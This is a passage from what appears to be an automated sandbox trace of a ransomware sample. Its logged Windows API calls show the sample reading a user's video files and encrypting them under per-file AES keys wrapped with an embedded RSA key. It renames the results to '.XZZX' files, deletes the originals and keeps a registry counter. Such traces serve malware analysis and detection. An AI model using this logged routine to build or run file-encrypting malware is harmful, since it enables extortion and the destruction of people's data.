(in: hKey=0x3cde658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0132.505] CryptEncrypt (in: hKey=0x3cde658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7c80*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7c80*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0132.505] WriteFile (in: hFile=0x6c4, lpBuffer=0x3cf7c80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7c80*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0132.505] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.505] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.505] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0132.506] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.506] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6d8) returned 0x0 [0132.506] RegQueryValueExW (in: hKey=0x6d8, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xb9, lpcbData=0x420dfdc*=0x4) returned 0x0 [0132.506] RegCloseKey (hKey=0x6d8) returned 0x0 [0132.506] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6d8) returned 0x0 [0132.506] RegSetValueExW (in: hKey=0x6d8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xba, cbData=0x4 | out: lpData=0x420dfec*=0xba) returned 0x0 [0132.506] RegCloseKey (hKey=0x6d8) returned 0x0 [0132.506] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.506] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.506] CloseHandle (hObject=0x6c4) returned 1 [0132.508] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.508] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.508] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\6OPfc4qVaMTq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\6opfc4qvamtq.flv")) returned 1 [0132.509] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\6OPfc4qVaMTq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\6opfc4qvamtq.flv")) returned 0 Thread: id = 450 os_tid = 0xa58 [0132.449] lstrcpyA (in: lpString1=0x435fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.450] lstrcpyW (in: lpString1=0x435f460, lpString2="MyRwYX_9-WNJ1OXdc1N.mp4" | out: lpString1="MyRwYX_9-WNJ1OXdc1N.mp4") returned="MyRwYX_9-WNJ1OXdc1N.mp4" [0132.450] lstrcpyW (in: lpString1=0x435e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.450] SetErrorMode (uMode=0x1) returned 0x1 [0132.450] lstrcpyW (in: lpString1=0x435f860, lpString2="MyRwYX_9-WNJ1OXdc1N.mp4" | out: lpString1="MyRwYX_9-WNJ1OXdc1N.mp4") returned="MyRwYX_9-WNJ1OXdc1N.mp4" [0132.450] CoCreateGuid (in: pguid=0x435e440 | out: pguid=0x435e440*(Data1=0x79fe4040, Data2=0x4ca, Data3=0x4206, Data4=([0]=0xaa, [1]=0x1b, [2]=0x99, [3]=0x7f, [4]=0x46, [5]=0xc2, [6]=0xa1, [7]=0x24))) returned 0x0 [0132.450] wsprintfW (in: param_1=0x435ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\MyRwYX_9-WNJ1OXdc1N.mp4") returned 76 [0132.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x435fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.450] wsprintfW (in: param_1=0x435e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\3B9FB280013C30BC79FE404005721504.XZZX") returned 90 [0132.450] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="XZZX") returned 0x0 [0132.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\MyRwYX_9-WNJ1OXdc1N.mp4", dwFileAttributes=0x20) returned 1 [0132.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\MyRwYX_9-WNJ1OXdc1N.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\myrwyx_9-wnj1oxdc1n.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c4 [0132.450] ReadFile (in: hFile=0x6c4, lpBuffer=0x3cffe68, nNumberOfBytesToRead=0x2afa, lpNumberOfBytesRead=0x435e418, lpOverlapped=0x0 | out: lpBuffer=0x3cffe68*, lpNumberOfBytesRead=0x435e418*=0x2afa, lpOverlapped=0x0) returned 1 [0132.452] CloseHandle (hObject=0x6c4) returned 1 [0132.452] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0132.452] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0132.452] SetErrorMode (uMode=0x1) returned 0x1 [0132.452] lstrcpyW (in: lpString1=0x435e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.452] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7b70) returned 1 [0132.455] CryptGenKey (in: hProv=0x3cf7b70, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11098) returned 1 [0132.667] CryptExportKey (in: hKey=0x3d11098, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x435e41c | out: pbData=0x0*, pdwDataLen=0x435e41c*=0x94) returned 1 [0132.667] CryptExportKey (in: hKey=0x3d11098, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x435e41c | out: pbData=0x40a0000*, pdwDataLen=0x435e41c*=0x94) returned 1 [0132.667] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.668] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.668] CryptDestroyKey (hKey=0x3d11098) returned 1 [0132.668] CryptReleaseContext (hProv=0x3cf7d08, dwFlags=0x0) returned 0 [0132.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\3B9FB280013C30BC79FE404005721504.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\3b9fb280013c30bc79fe404005721504.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6d0 [0132.669] WriteFile (in: hFile=0x6d0, lpBuffer=0x3cffe68*, nNumberOfBytesToWrite=0x2afa, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3cffe68*, lpNumberOfBytesWritten=0x435e438*=0x2afa, lpOverlapped=0x0) returned 1 [0132.669] SetFilePointer (in: hFile=0x6d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2afa [0132.669] WriteFile (in: hFile=0x6d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0132.669] SetFilePointer (in: hFile=0x6d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2aff [0132.669] WriteFile (in: hFile=0x6d0, lpBuffer=0x435f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x435f860*, lpNumberOfBytesWritten=0x435e438*=0x2e, lpOverlapped=0x0) returned 1 [0132.669] SetFilePointer (in: hFile=0x6d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b2d [0132.669] WriteFile (in: hFile=0x6d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0132.670] SetFilePointer (in: hFile=0x6d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b32 [0132.670] SetErrorMode (uMode=0x1) returned 0x1 [0132.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.670] OutputDebugStringW (lpOutputString="end") [0132.670] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ5\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.670] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x435dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8 | out: pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8) returned 1 [0132.670] CryptAcquireContextW (in: phProv=0x435d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x435d3e4*=0x3cf7d90) returned 1 [0132.670] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7d90, dwCertEncodingType=0x1, pInfo=0x3cf1920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1958*, PublicKey.cUnusedBits=0x0), phKey=0x435d3ec | out: phKey=0x435d3ec*=0x3d11098) returned 1 [0132.670] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.671] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.671] CryptEncrypt (in: hKey=0x3d11098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x435d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x435d3f0*=0x80) returned 1 [0132.671] CryptEncrypt (in: hKey=0x3d11098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7e18*, pdwDataLen=0x435d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7e18*, pdwDataLen=0x435d3e8*=0x80) returned 1 [0132.671] WriteFile (in: hFile=0x6d0, lpBuffer=0x3cf7e18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7e18*, lpNumberOfBytesWritten=0x435e438*=0x80, lpOverlapped=0x0) returned 1 [0132.671] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.671] WriteFile (in: hFile=0x6d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0132.672] GetUserNameW (in: lpBuffer=0x435e1f8, pcbBuffer=0x435dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x435dfe0) returned 1 [0132.714] wsprintfW (in: param_1=0x435dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.714] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe4 | out: phkResult=0x435dfe4*=0x6dc) returned 0x0 [0132.715] RegQueryValueExW (in: hKey=0x6dc, lpValueName="E1010314", lpReserved=0x0, lpType=0x435dfd8, lpData=0x435dfec, lpcbData=0x435dfdc*=0x4 | out: lpType=0x435dfd8*=0x4, lpData=0x435dfec*=0xba, lpcbData=0x435dfdc*=0x4) returned 0x0 [0132.715] RegCloseKey (hKey=0x6dc) returned 0x0 [0132.715] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe8 | out: phkResult=0x435dfe8*=0x6dc) returned 0x0 [0132.715] RegSetValueExW (in: hKey=0x6dc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x435dfec*=0xbb, cbData=0x4 | out: lpData=0x435dfec*=0xbb) returned 0x0 [0132.715] RegCloseKey (hKey=0x6dc) returned 0x0 [0132.715] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.715] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.715] CloseHandle (hObject=0x6d0) returned 1 [0132.716] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.717] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.717] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\MyRwYX_9-WNJ1OXdc1N.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\myrwyx_9-wnj1oxdc1n.mp4")) returned 1 [0132.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\MyRwYX_9-WNJ1OXdc1N.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\myrwyx_9-wnj1oxdc1n.mp4")) returned 0 Thread: id = 451 os_tid = 0xa5c [0132.590] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.590] lstrcpyW (in: lpString1=0x420f460, lpString2="yXpEf4.mkv" | out: lpString1="yXpEf4.mkv") returned="yXpEf4.mkv" [0132.590] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.590] SetErrorMode (uMode=0x1) returned 0x1 [0132.590] lstrcpyW (in: lpString1=0x420f860, lpString2="yXpEf4.mkv" | out: lpString1="yXpEf4.mkv") returned="yXpEf4.mkv" [0132.590] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd479b5f, Data2=0xbc9c, Data3=0x40c8, Data4=([0]=0xbd, [1]=0xa2, [2]=0xc1, [3]=0xe6, [4]=0x1d, [5]=0xab, [6]=0x16, [7]=0x6c))) returned 0x0 [0132.590] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\yXpEf4.mkv") returned 63 [0132.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.590] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned 90 [0132.590] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="XZZX") returned 0x0 [0132.590] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\yXpEf4.mkv", dwFileAttributes=0x20) returned 1 [0132.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\yXpEf4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\yxpef4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6d0 [0132.591] ReadFile (in: hFile=0x6d0, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0x11a35, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x420e418*=0x11a35, lpOverlapped=0x0) returned 1 [0132.592] CloseHandle (hObject=0x6d0) returned 1 [0132.592] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0132.592] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0132.592] SetErrorMode (uMode=0x1) returned 0x1 [0132.592] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.592] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7d08) returned 1 [0132.594] CryptGenKey (in: hProv=0x3cf7d08, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11198) returned 1 [0132.749] CryptExportKey (in: hKey=0x3d11198, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.749] CryptExportKey (in: hKey=0x3d11198, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x420e41c | out: pbData=0x4210000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.749] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.750] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.750] CryptDestroyKey (hKey=0x3d11198) returned 1 [0132.750] CryptReleaseContext (hProv=0x3cf7d08, dwFlags=0x0) returned 0 [0132.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\adbc71e42fba59e00d479b5f33db3e28.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6dc [0132.751] WriteFile (in: hFile=0x6dc, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0x11a35, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x420e438*=0x11a35, lpOverlapped=0x0) returned 1 [0132.752] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a35 [0132.752] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.752] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a3a [0132.752] WriteFile (in: hFile=0x6dc, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0132.752] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a4e [0132.752] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.753] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a53 [0132.753] SetErrorMode (uMode=0x1) returned 0x1 [0132.753] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.753] OutputDebugStringW (lpOutputString="end") [0132.753] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.753] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: 